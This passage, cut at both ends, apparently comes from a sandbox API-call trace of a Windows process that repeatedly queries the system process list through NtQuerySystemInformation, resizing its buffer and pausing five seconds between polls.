RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0109.793] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0109.794] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0109.794] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0109.794] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0109.796] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0109.797] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0109.809] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0109.809] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0109.810] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0109.810] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0109.810] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0109.813] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0109.813] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0109.825] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0109.825] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0109.826] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0109.826] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0109.826] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0109.828] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0109.829] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0109.840] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0109.840] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0109.841] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0109.841] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0109.842] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0109.845] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0109.846] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0109.856] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0109.856] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0109.857] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0109.857] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0109.857] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0109.860] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0109.860] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0109.871] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0109.871] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0109.872] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0109.872] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0109.873] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0109.875] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0109.876] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0109.918] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0109.919] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0109.919] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0109.920] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0109.920] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0109.926] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0109.927] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0109.944] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0109.944] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0109.944] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0109.945] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0109.945] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0109.947] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0109.948] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0109.949] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0109.949] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0109.950] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0109.950] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0109.950] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0109.953] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0109.953] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0109.965] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0109.965] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0109.966] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0109.966] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0109.966] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0109.969] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0109.969] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0109.980] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0109.981] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0109.981] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0109.981] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0109.982] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0109.984] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0109.985] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0109.996] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0109.996] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0109.997] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0109.997] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0109.997] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0109.999] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0110.000] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0110.015] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0110.016] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0110.016] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0110.016] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0110.017] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0110.019] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0110.020] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0110.027] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0110.027] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0110.028] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0110.028] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0110.028] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0110.031] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0110.032] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0110.043] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0110.043] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0110.044] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0110.044] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0110.044] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0110.046] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0110.047] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0110.058] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0110.059] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0110.059] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0110.060] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0110.060] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0110.062] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0110.063] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0110.074] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0110.074] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0110.075] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0110.076] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0110.076] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0110.079] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0110.080] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0110.090] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0110.090] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0110.090] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0110.091] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0110.091] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0110.093] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0110.093] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0110.105] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0110.105] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0110.106] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0110.106] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0110.106] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0110.108] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0110.109] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0110.122] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0110.122] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0110.122] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0110.123] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0110.123] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0110.125] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0110.125] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0110.136] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0110.137] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0110.138] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0110.138] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0110.138] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0110.140] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0110.141] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0110.152] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0110.152] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0110.153] 